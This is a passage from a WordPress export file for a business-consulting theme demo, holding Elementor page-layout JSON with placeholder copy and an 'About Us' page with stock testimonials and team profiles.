downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"22515c1","elType":"widget","settings":{"title":"Heading 6","header_size":"h6","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"aa2835e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e2eb3b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4555825","elType":"widget","settings":{"title":"IV Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e1bd3b8","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7359c5a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"f199e08","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6eacc12","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"bc73054","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2b7bef0","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"8e362cb","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9b85fb3","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"52ae6c7","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"aedecf5","elType":"widget","settings":{"title":"III Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0aaf919","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"c3e0f34","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"67b4e55","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b8d273a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8de19bc","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"097ada7","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34bf2f6","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"a92b63b","elType":"widget","settings":{"title":"II Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a598d52","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"40c0145","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"50ffc56","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"69df804","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"415941f","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"010c8ae","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"093badb","elType":"widget","settings":{"title":"Text Elements","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"127fad1","elType":"widget","settings":{"editor":"<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what\u2019s likely to <span style=\"color: #d92300;\">happen to demand over the next several years.<\/span> Think, for example, of <span style=\"color: #d92300; font-weight: 600;\">personal computer monitors or other types<\/span> of goods that were declining pre-pandemic and fall into the \u201cshort-term spike, long-term decline\u201d archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick<\/em>.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ad421e7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4ca1f31","elType":"widget","settings":{"title":"Highlights","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5249e8e","elType":"widget","settings":{"editor":"<p><span style=\"background: #d92300; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c9dd334","elType":"widget","settings":{"editor":"<p><span style=\"background: #262832; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff8b1b8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"006991d","elType":"widget","settings":{"title":"Dropcaps","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e9b8646","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e41f15a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"82d3b4a","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\" style=\"background: #d92300;\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ab0df6a","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"336d7e3","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"9c81ff3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"55e9a19","elType":"widget","settings":{"title":"Listings","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"297dfb9","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"8d62022","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b9ca8ad","elType":"widget","settings":{"editor":"<ol><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ol>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7b081bc","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"0cf1b0f","elType":"widget","settings":{"editor":"<ul><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ul>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6f037fd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"f728999","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"6484bff","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"fff55a7","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true},{"id":"99d54a9","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"c5b4eb2","elType":"widget","settings":{"title":"Blockquote","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0310507","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"40df4db","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true},{"id":"8a5f517","elType":"column","settings":{"_column_size":33,"_inline_size":59.33200000000000073896444519050419330596923828125},"elements":[{"id":"c1a7fe1","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"768ca46","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:7:"heading";a:3:{s:5:"count";i:14;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:14;s:11:"header_size";i:13;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:14;}}}}s:11:"text-editor";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:23;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:9;s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:22:"typography_font_weight";i:2;s:22:"typography_line_height";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:2:{s:5:"color";i:6;s:3:"gap";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:6;}}}}s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:19;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:6;s:6:"layout";i:6;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:2;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2029]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>About Us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=487</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="630" height="475" src="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg 630w, https://maxbizz.s3.amazonaws.com/images/image1-about-us-300x226.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" />											
	        about company	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p><hr /><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.</p>		
										<img width="204" height="52" src="https://maxbizz.s3.amazonaws.com/images/signature-home3.png" alt="" loading="lazy" />											
			<h6>Peter Adams</h6>		
		<p>co-founder of company</p>		
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        what we do	        <h3>Creating Your Startup Business</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Management Skills"></a>					
						<h5><a href="#">Management Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
										<img width="516" height="625" src="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png 516w, https://maxbizz.s3.amazonaws.com/images/image2-about-us-248x300.png 248w" sizes="(max-width: 516px) 100vw, 516px" />											
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
	        our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-team">Explore More </a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>487</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[about-us]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"aeaf1cb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"120","right":"0","bottom":"115","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e209ac4","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100},"elements":[{"id":"34ca8c4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-about-us.jpg","id":2037},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"-60","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"1feb286","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"100","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"841e06b","elType":"widget","settings":{"sub":"about company","title":"Make Digital Marketing  Work For Your 